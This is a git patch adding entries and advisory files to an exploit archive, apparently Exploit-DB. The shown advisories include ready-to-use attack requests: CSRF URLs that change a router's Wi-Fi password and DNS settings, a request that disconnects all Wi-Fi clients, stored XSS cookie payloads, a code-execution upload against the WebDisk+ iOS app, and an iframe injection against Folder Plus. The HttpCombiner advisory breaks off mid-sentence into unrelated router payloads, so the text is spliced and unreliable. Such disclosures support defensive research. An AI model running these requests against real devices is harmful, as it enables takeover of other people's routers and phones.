From 1709d70e04cfa058d0534476ccd6c4ee7aa8a777 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 29 Oct 2014 04:45:11 +0000 Subject: [PATCH] Updated 10_29_2014 --- files.csv | 25 +++ platforms/asp/webapps/34920.txt | 39 ++++ platforms/hardware/remote/35068.txt | 9 + platforms/hardware/remote/35069.txt | 9 + platforms/hardware/remote/35070.txt | 9 + platforms/hardware/remote/35071.txt | 9 + platforms/hardware/webapps/35047.txt | 199 ++++++++++++++++++ platforms/hardware/webapps/35075.txt | 118 +++++++++++ platforms/ios/webapps/35082.txt | 223 ++++++++++++++++++++ platforms/ios/webapps/35083.txt | 241 ++++++++++++++++++++++ platforms/jsp/webapps/35079.txt | 53 +++++ platforms/linux/dos/35081.txt | 61 ++++++ platforms/multiple/remote/35062.txt | 9 + platforms/multiple/webapps/35076.py | 89 ++++++++ platforms/php/webapps/34593.txt | 75 +++++++ platforms/php/webapps/34717.txt | 31 +++ platforms/php/webapps/34965.txt | 47 +++++ platforms/php/webapps/35046.txt | 57 ++++++ platforms/php/webapps/35066.txt | 9 + platforms/php/webapps/35067.txt | 9 + platforms/php/webapps/35072.txt | 37 ++++ platforms/php/webapps/35073.txt | 67 ++++++ platforms/php/webapps/35080.pl | 186 +++++++++++++++++ platforms/unix/remote/35078.rb | 139 +++++++++++++ platforms/windows/local/35074.py | 38 ++++ platforms/windows/remote/34647.txt | 293 +++++++++++++++++++++++++++ 26 files changed, 2081 insertions(+) create mode 100755 platforms/asp/webapps/34920.txt create mode 100755 platforms/hardware/remote/35068.txt create mode 100755 platforms/hardware/remote/35069.txt create mode 100755 platforms/hardware/remote/35070.txt create mode 100755 platforms/hardware/remote/35071.txt create mode 100755 platforms/hardware/webapps/35047.txt create mode 100755 platforms/hardware/webapps/35075.txt create mode 100755 platforms/ios/webapps/35082.txt create mode 100755 platforms/ios/webapps/35083.txt create mode 100755 platforms/jsp/webapps/35079.txt create mode 100755 platforms/linux/dos/35081.txt create mode 100755 platforms/multiple/remote/35062.txt create mode 100755 platforms/multiple/webapps/35076.py create mode 100755 platforms/php/webapps/34593.txt create mode 100755 platforms/php/webapps/34717.txt create mode 100755 platforms/php/webapps/34965.txt create mode 100755 platforms/php/webapps/35046.txt create mode 100755 platforms/php/webapps/35066.txt create mode 100755 platforms/php/webapps/35067.txt create mode 100755 platforms/php/webapps/35072.txt create mode 100755 platforms/php/webapps/35073.txt create mode 100755 platforms/php/webapps/35080.pl create mode 100755 platforms/unix/remote/35078.rb create mode 100755 platforms/windows/local/35074.py create mode 100755 platforms/windows/remote/34647.txt diff --git a/files.csv b/files.csv index f66d446d6..ebf68fa5a 100755 --- a/files.csv +++ b/files.csv @@ -31149,6 +31149,7 @@ id,file,description,date,author,platform,type,port 34588,platforms/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilty",2014-09-09,jsass,aix,dos,0 34589,platforms/php/webapps/34589.txt,"Wordpress WP Support Plus Responsive Ticket System 2.0 Plugin - Multiple Vulnerabilities",2014-09-09,"Fikri Fadzil",php,webapps,0 34592,platforms/linux/shellcode/34592.c,"Obfuscated Shellcode Linux x86 - chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User & Execute /bin/bash",2014-09-09,"Ali Razmjoo",linux,shellcode,0 +34593,platforms/php/webapps/34593.txt,"Parallels Plesk Sitebuilder 9.5 - Multiple Vulnerabilities",2014-09-09,alieye,php,webapps,0 34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,metasploit,windows,remote,8020 34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 Remote Root Code Execution Vulnerability",2014-09-09,eF,linux,remote,80 34596,platforms/php/webapps/34596.txt,"Pligg CMS 1.0.4 SQL Injection and Cross Site Scripting Vulnerabilities",2010-09-03,"Bogdan Calin",php,webapps,0 @@ -31197,6 +31198,7 @@ id,file,description,date,author,platform,type,port 34644,platforms/php/webapps/34644.txt,"Silurus Classifieds wcategory.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0 34645,platforms/php/webapps/34645.txt,"Silurus Classifieds search.php keywords Parameter XSS",2009-08-06,Moudi,php,webapps,0 34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0 +34647,platforms/windows/remote/34647.txt,"Ammyy Admin 3.5 - RCE",2014-09-13,scriptjunkie,windows,remote,0 34648,platforms/windows/local/34648.txt,"Comodo Internet Security - HIPS/Sandbox Escape PoC",2014-09-13,"Joxean Koret",windows,local,0 34649,platforms/php/webapps/34649.txt,"Netautor Professional 5.5 'login2.php' Cross Site Scripting Vulnerability",2010-09-17,"Gjoko Krstic",php,webapps,0 34650,platforms/php/webapps/34650.txt,"e-Soft24 Flash Games Script 1.0 Cross Site Scripting Vulnerability",2009-08-30,"599eme Man",php,webapps,0 @@ -31264,6 +31266,7 @@ id,file,description,date,author,platform,type,port 34713,platforms/php/webapps/34713.txt,"Freelancers placebid.php id Parameter XSS",2009-08-17,Moudi,php,webapps,0 34714,platforms/php/webapps/34714.txt,"Freelancers post_resume.php jobid Parameter XSS",2009-08-17,Moudi,php,webapps,0 34715,platforms/php/webapps/34715.txt,"AdQuick 'account.php' Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0 +34717,platforms/php/webapps/34717.txt,"vBulletin 4.x Verify Email Before Registration Plugin - SQL Injection",2014-09-20,Dave,php,webapps,0 34718,platforms/php/webapps/34718.txt,"M/Monit 3.3.2 - CSRF Vulnerability",2014-09-20,"Dolev Farhi",php,webapps,0 34720,platforms/windows/dos/34720.pl,"Fast Image Resizer 098 - Local Crash Poc",2014-09-20,"niko sec",windows,dos,0 34721,platforms/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Stored XSS",2014-09-20,"Brij Kishore Mishra",php,webapps,0 @@ -31446,6 +31449,7 @@ id,file,description,date,author,platform,type,port 34917,platforms/multiple/webapps/34917.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/webseal method Parameter XSS",2010-10-22,IBM,multiple,webapps,0 34918,platforms/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19 and 7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",cgi,webapps,443 34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 'admin.php' Directory Traversal Vulnerability",2009-07-16,MaXe,php,webapps,0 +34920,platforms/asp/webapps/34920.txt,"HttpCombiner ASP.NET - Remote File Disclosure Vulnerability",2014-10-07,"Le Ngoc Son",asp,webapps,0 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0 34922,platforms/php/webapps/34922.txt,"Creative Contact Form - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 34923,platforms/linux/local/34923.c,"Linux Kernel 3.16.1 - Remount FUSE Exploit",2014-10-09,"Andy Lutomirski",linux,local,0 @@ -31485,6 +31489,7 @@ id,file,description,date,author,platform,type,port 34957,platforms/ios/webapps/34957.txt,"PayPal Inc BB #85 MB iOS 4.6 - Auth Bypass Vulnerability",2014-10-14,Vulnerability-Lab,ios,webapps,0 34958,platforms/php/webapps/34958.py,"Croogo 2.0.0 - Arbitrary PHP Code Execution Exploit",2014-10-14,LiquidWorm,php,webapps,0 34959,platforms/php/webapps/34959.txt,"Croogo 2.0.0 - Multiple Stored XSS Vulnerabilities",2014-10-14,LiquidWorm,php,webapps,0 +34965,platforms/php/webapps/34965.txt,"Change CMS 3.6.8 - Multiple CSRF Vulnerabilities",2014-10-14,"Krusty Hack",php,webapps,0 34966,platforms/windows/local/34966.txt,"Telefonica O2 Connection Manager 3.4 - Local Privilege Escalation Vulnerability",2014-10-14,LiquidWorm,windows,local,0 34967,platforms/windows/local/34967.txt,"Telefonica O2 Connection Manager 8.7 - Service Trusted Path Privilege Escalation",2014-10-14,LiquidWorm,windows,local,0 34968,platforms/php/webapps/34968.txt,"YourMembers Plugin - Blind SQL Injection",2014-10-14,TranDinhTien,php,webapps,0 @@ -31560,6 +31565,8 @@ id,file,description,date,author,platform,type,port 35043,platforms/php/webapps/35043.txt,"Contenido CMS 4.8.12 Multiple Cross Site Scripting Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0 35044,platforms/php/webapps/35044.txt,"Alguest 1.1 Multiple Cookie Authentication Bypass Vulnerabilities",2010-12-03,"Aliaksandr Hartsuyeu",php,webapps,0 35045,platforms/asp/webapps/35045.txt,"DotNetNuke 5.5.1 'InstallWizard.aspx' Cross Site Scripting Vulnerability",2010-12-03,"Richard Brain",asp,webapps,0 +35046,platforms/php/webapps/35046.txt,"Axway Secure Transport 5.1 SP2 - Arbitary File Upload via CSRF",2014-10-23,"Emmanuel Law",php,webapps,0 +35047,platforms/hardware/webapps/35047.txt,"Dell SonicWall GMS 7.2.x - Code Injection",2014-10-23,Vulnerability-Lab,hardware,webapps,0 35048,platforms/asp/webapps/35048.txt,"Techno Dreams Articles & Papers Package 2.0 'ArticlesTablelist.asp' SQL Injection Vulnerability",2010-12-04,R4dc0re,asp,webapps,0 35049,platforms/asp/webapps/35049.txt,"Techno Dreams FAQ Manager Package 1.0 'faqlist.asp' SQL Injection Vulnerability",2010-12-04,R4dc0re,asp,webapps,0 35050,platforms/php/webapps/35050.txt,"Alguest 1.1 'start' Parameter SQL Injection Vulnerability",2010-12-06,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -31572,6 +31579,24 @@ id,file,description,date,author,platform,type,port 35059,platforms/ios/webapps/35059.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-25,Vulnerability-Lab,ios,webapps,0 35060,platforms/php/webapps/35060.txt,"Aigaion 1.3.4 'ID' Parameter SQL Injection Vulnerability",2010-12-07,KnocKout,php,webapps,0 35061,platforms/linux/dos/35061.c,"GNU glibc 'regcomp()' Stack Exhaustion Denial Of Service Vulnerability",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0 +35062,platforms/multiple/remote/35062.txt,"RDM Embedded Lock Manager < 9.x - 'lm_tcp' Service Buffer Overflow Vulnerability",2010-12-07,"Luigi Auriemma",multiple,remote,0 35063,platforms/php/webapps/35063.txt,"Zimplit CMS zimplit.php file Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0 35064,platforms/php/webapps/35064.txt,"Zimplit CMS English_manual_version_2.php client Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0 35065,platforms/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 Multiple Cross Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps,0 +35066,platforms/php/webapps/35066.txt,"WordPress Processing Embed Plugin 0.5 'pluginurl' Parameter Cross Site Scripting Vulnerability",2010-12-08,"John Leitch",php,webapps,0 +35067,platforms/php/webapps/35067.txt,"WordPress Safe Search Plugin 'v1' Parameter Cross Site Scripting Vulnerability",2010-12-08,"John Leitch",php,webapps,0 +35068,platforms/hardware/remote/35068.txt,"pfSense pkg_edit.php id Parameter XSS",2010-11-08,"dave b",hardware,remote,0 +35069,platforms/hardware/remote/35069.txt,"pfSense pkg.php xml Parameter XSS",2010-11-08,"dave b",hardware,remote,0 +35070,platforms/hardware/remote/35070.txt,"pfSense status_graph.php if Parameter XSS",2010-11-08,"dave b",hardware,remote,0 +35071,platforms/hardware/remote/35071.txt,"pfSense interfaces.php if Parameter XSS",2010-11-08,"dave b",hardware,remote,0 +35072,platforms/php/webapps/35072.txt,"Drupal Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam Multiple Vulnerabilities",2010-12-08,"Justin Klein Keane",php,webapps,0 +35073,platforms/php/webapps/35073.txt,"Wordpress CP Multi View Event Calendar 1.01 - SQL Injection",2014-10-27,"Claudio Viviani",php,webapps,80 +35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 (.wav) - Buffer Overflow",2014-10-27,metacom,windows,local,0 +35075,platforms/hardware/webapps/35075.txt,"CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities",2014-10-27,LiquidWorm,hardware,webapps,0 +35076,platforms/multiple/webapps/35076.py,"HP Operations Agent Remote XSS iFrame Injection",2014-10-27,"Matt Schmidt",multiple,webapps,383 +35078,platforms/unix/remote/35078.rb,"Centreon SQL and Command Injection",2014-10-27,metasploit,unix,remote,80 +35079,platforms/jsp/webapps/35079.txt,"Mulesoft ESB Runtime 3.5.1 - Privilege Escalation Vulnerability",2014-10-27,"Brandon Perry",jsp,webapps,8585 +35080,platforms/php/webapps/35080.pl,"Incredible PBX 2.0.6.5.0 - Remote Command Execution",2014-10-27,"Simo Ben Youssef",php,webapps,80 +35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0 +35082,platforms/ios/webapps/35082.txt,"WebDisk+ 2.1 iOS - Code Execution Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,1861 +35083,platforms/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent XSS Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,0 diff --git a/platforms/asp/webapps/34920.txt b/platforms/asp/webapps/34920.txt new file mode 100755 index 000000000..6c0004b3f --- /dev/null +++ b/platforms/asp/webapps/34920.txt @@ -0,0 +1,39 @@ +# Exploit Title: HttpCombiner ASP.NET Remote File Disclosure Vulnerability +# Google Dork: [filetype:txt intext:HttpCombiner.ashx] +# Date: 2014-10-10 +# Exploit Author: Hoang Anh Thai +# Vendor Homepage: https://myfirstsamplepagebyilyasforassign.googlecode.com/files/HttpCombiner-v1.zip +# Reference: http://www.codeproject.com/KB/aspnet/HttpCombine.aspx +# Affected Versions: HttpCombiner v1.0 +# Tested on: Windows 7 / Chrome & Internet Explorer + +Description: +============ + +An HTTP handler that combines multiple CSS, Javascript or URL into one response for faster page load. It can combine, compress and cache response which results in faster page load and better scalability of web application + +It's a good practice to use many small Javascript and CSS files instead of one large Javascript/CSS file for better code maintainability, but bad in terms of website performance. Although you should write your Javascript code in small files and break large CSS files into small chunks but when browser requests those javascript and css files, it makes one Http request per file. Every Http Request results in a network roundtrip form your browser to the server and the delay in reaching the server and coming back to the browser is called latency. So, if you have four javascripts and three css files loaded by a page, you are wasting time in seven network roundtrips. Within USA, latency is average 70ms. So, you waste 7x70 = 490ms, about half a second of delay. Outside USA, average latency is around 200ms. So, that means 1400ms of waiting. Browser cannot show the page properly until Css and Javascripts are fully loaded. So, the more latency you have, the slower page loads. + +You can reduce the wait time by using a CDN. Read my previous blog post about using CDN. However, a better solution is to deliver multiple files over one request using an HttpHandler that combines several files and delivers as one output. So, instead of putting many + + +-- + + +Denial of Service (DoS) for all WiFi connected clients (disconnect) +################################################################### + +GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1 + + +Stored Cross-Site Scripting (XSS) Vulnerability +############################################### + +Cookie: userData +Value: hax0r"> + +-- + + +; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/"; + + + +-- + + +Cross-Site Request Forgery (CSRF) Vulnerability +############################################### + +DDNS config: +------------ + +GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1 + + +Change wifi pass: +----------------- + +GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1 + + +Add static mac address (static assigned dhcp client): +----------------------------------------------------- + +GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1 + + +Enable/Disable UPnP: +-------------------- + +GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable) +GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable) + diff --git a/platforms/ios/webapps/35082.txt b/platforms/ios/webapps/35082.txt new file mode 100755 index 000000000..cc7df2e38 --- /dev/null +++ b/platforms/ios/webapps/35082.txt @@ -0,0 +1,223 @@ +Document Title: +=============== +WebDisk+ v2.1 iOS - Code Execution Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1349 + + +Release Date: +============= +2014-10-23 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1349 + + +Common Vulnerability Scoring System: +==================================== +9.1 + + +Product & Service Introduction: +=============================== +WebDisk+ is a Push verion of WebDisk. It have all Full functionality of WebDisk .lets your iphone/ipad become a file website over +wi-fi netwrk.You can upload/download your document to your iphone/ipad on your pc browser over wi-fi. And it is also a document +viewer.let you direct view your document on your iphone/iphone. WebDisk+ can support Upload and download large files (More than 4GB) +form pc or other mobile device. + +(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/webdisk+/id606709149 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research team discovered a code execution vulnerability in the official AirPhoto WebDisk+ v2.1 iOS mobile web-application. + + +Vulnerability Disclosure Timeline: +================================== +2014-10-23: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +AirPhoto +Product: WebDisk+ - iOS Mobile Web Application (Wifi) 2.1 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Critical + + +Technical Details & Description: +================================ +A code execution web vulnerability has been discovered in the official AirPhoto WebDisk+ v2.1 iOS mobile web-application. +The vulnerability allows remote attackers to compromise the application and connected device components by exploitation +of a system specific code execution vulnerability in the wifi interface. + +The vulnerability is located in the `name` input field of the wifi web interface upload module (afupload.ma). The function creates +the files without any protection or filter mechanism in the GET method request. Remote attackers are able to manipulate the GET method +request by usage of the `p & filename` parameters in the `afupload.ma` file to compromise the application or device. The execution of +the code occurs in the `afgetdir.ma` file of the wifi interface. The attack vector is located on the application-side of the mobile app +and the request method to inject/execute is GET. + +The security risk of the code execution vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 9.1. +Exploitation of the code execution vulnerability requires no privileged application user account or user interaction. Successful exploitation +of the code execution vulnerability results in mobile application compromise and affected or connected device component compromise. + +Request Method(s): + [+] GET + +Vulnerable Module(s): + [+] Upload + +Vulnerable File(s): + [+] afupload.ma + +Vulnerable Parameter(s): + [+] p & filename + +Affected Module(s): + [+] Wifi Interface (http://localhost:1861) + + +Proof of Concept (PoC): +======================= +The code execution web vulnerability can be exploited by remote attackers without privileged application user account or user interaction. +For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. + + +PoC: (URL) +http://localhost:1861/afgetdir.ma?p=\var\mobile\Containers\Data\Application\90ACE99A-5EF3-4E3E-B509-32CCDF066AA1\Documents\ + + +PoC: localhost:1861 - Web Interface Index + + +-[CODE EXECUTION VULNERABILITY VIA GET]; +10-22 13:28

+delete +
+ + + +Note: +The input field to create/upload files allows a remote attacker to execute codes directly in the web-server with multiple attack vectors. + + +--- PoC Session Logs (POST) --- +Status: 302[OK] +POST http://192.168.2.104:1861/afupload.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C +Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type] + Request Header: + Host[192.168.2.104:1861] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------531465230341 +Content-Disposition: form-data; name="txt" +-[CODE EXECUTION VULNERABILITY VIA GET]; +-----------------------------531465230341 +Content-Disposition: form-data; name="file"; filename="[PENG!]" +Content-Type: application/octet-stream +-----------------------------531465230341 +Content-Disposition: form-data; name="sub" +upload +-----------------------------531465230341--] + Response Header: + Location[afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C] + Content-Length[0] + Server[MHttpServer/1.0.0] Status: 200[OK] +GET http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C +Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3051] Mime Type[text/html] + Request Header: + Host[192.168.2.104:1861] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C] + Connection[keep-alive] + Response Header: + Content-Type[text/html] + Content-Length[3051] + Server[MHttpServer/1.0.0] + + +Reference(s): +afgetdir.ma +afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C +afupload.ma +afupload.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C + + +Solution - Fix & Patch: +======================= +To patch the vulnerability it is required to parse and encode the upload GET method request. +Restrict the input field of the p & filename value to prevent code execution in the main wifi interface. + + +Security Risk: +============== +The security risk of the code execution web vulnerability in the path value is estimated as critical. (CVSS 9.1) + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, +policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2014 | Vulnerability Laboratory - Evolution Security GmbH ™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + +COMPANY: Evolution Security GmbH +BUSINESS: www.evolution-sec.com + + diff --git a/platforms/ios/webapps/35083.txt b/platforms/ios/webapps/35083.txt new file mode 100755 index 000000000..467b0197d --- /dev/null +++ b/platforms/ios/webapps/35083.txt @@ -0,0 +1,241 @@ +Document Title: +=============== +Folder Plus v2.5.1 iOS - Persistent Item Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1348 + + +Release Date: +============= +2014-10-24 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1348 + + +Common Vulnerability Scoring System: +==================================== +3.5 + + +Product & Service Introduction: +=============================== +The ability to use multi touch to quickly move between viewing and editing files is also very good if you’re willing to utilize it. - Touch Reviews. +Folder Plus is an In-App Multitasking Capable File Manager/Viewer/Editor, with 3-Finger Swipes You Switch between Tasks of File Managing, Viewing, +Editing, etc QUICKLY. + +(Copy of the Vendor Homepage: http://theverygames.com/folder-plus/ & https://itunes.apple.com/us/app/file-manager-folder-plus/id484856077 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered a persistent input validation web vulnerability in the official The Very Games `Folder Plus` iOS mobile application. + + +Vulnerability Disclosure Timeline: +================================== +2014-10-24: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +The Very Games +Product: Folder Plus - iOS Mobile Web Application (Wifi) 2.5.1 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Technical Details & Description: +================================ +A persistent input validation web vulnerability has been discovered in the official Folder Plus v2.5.1 iOS mobile application. +The issue allows an attacker to inject own script code as payload to the application-side of the vulnerable service function or module. + +The vulnerability is located in the delete item message context of the wifi interface listing module. The issue allows remote attackers +to inject own persistent script codes by usage of the vulnerable create folder function. The attacker injects a script code payloads and +waits for a higher privileged delete of the item to execute the script codes. The execution of the injected script code occurs in the +delete message context to confirm to erase. The attack vector is persistent on the application-side and the request method to execute +is GET. The issue allows to stream persistent malicious script codes to the front site wifi root path. + +The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.5. +Exploitation of the application-side web vulnerability requires a low privileged web-application user account and low or medium user interaction. +Successful exploitation of the vulnerabilities result in persistent phishing, session hijacking, persistent external redirect to malicious +sources and application-side manipulation of affected or connected module context. + +Request Method(s): + [+] GET + +Vulnerable Module(s): + [+] Wifi Sharing + +Vulnerable Function(s): + [+] Delete Item + +Vulnerable Parameter(s): + [+] items name + +Affected Module(s): + [+] Wifi Interface - Root Index + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerability can be exploited by remote attackers without privileged application user account and with +low or medium user interaction. For security demonstration or to reproduce the issue follow the provided information and steps below to continue. + +PoC: Folder Plus > THE VERY GAMES - Wifi UI Index + +????? + + +Delete
"><[PERSISTENT INJECTED SCRIPT CODE!]);">
?????? + + + + +
Cancel
+ +
Delete
 + + + + + + + + + + + + +--- PoC Session Logs [POST] --- +Status: 200[OK] +GET http://localhost/?action=directory&path=%3Ciframe%20src%3Dhttp://www.vulnerability-lab.com%3E Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[2] Mime Type[application/json] + Request Header: + Host[localhost] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[application/json, text/javascript, */*; q=0.01] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost/] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[2] + Vary[Accept] + Content-Type[application/json] + Date[Tue, 21 Oct 2014 15:42:33 GMT] + +Status: 200[OK] +GET http://localhost/?action=list Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[491] Mime Type[application/json] + Request Header: + Host[localhost] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[application/json, text/javascript, */*; q=0.01] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost/] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[491] + Vary[Accept] + Content-Type[application/json] + Date[Tue, 21 Oct 2014 15:42:34 GMT] + +Status: 200[OK] +GET http://localhost/[PERSISTENT INJECTED SCRIPT CODE!] Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost/] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[0] + Date[Tue, 21 Oct 2014 15:42:36 GMT] + + +Reference(s): +http://localhost/?action= +http://localhost/?action=directory&path= + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure restriction implementation and filter mechanism on new folder inputs. +After the restriction the input needs to be encoded or parsed to prevent the persistent script code execution in the delete function. + + +Security Risk: +============== +The security risk of the persistent input validation web vulnerability in the delete item function is estimated as medium. + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it 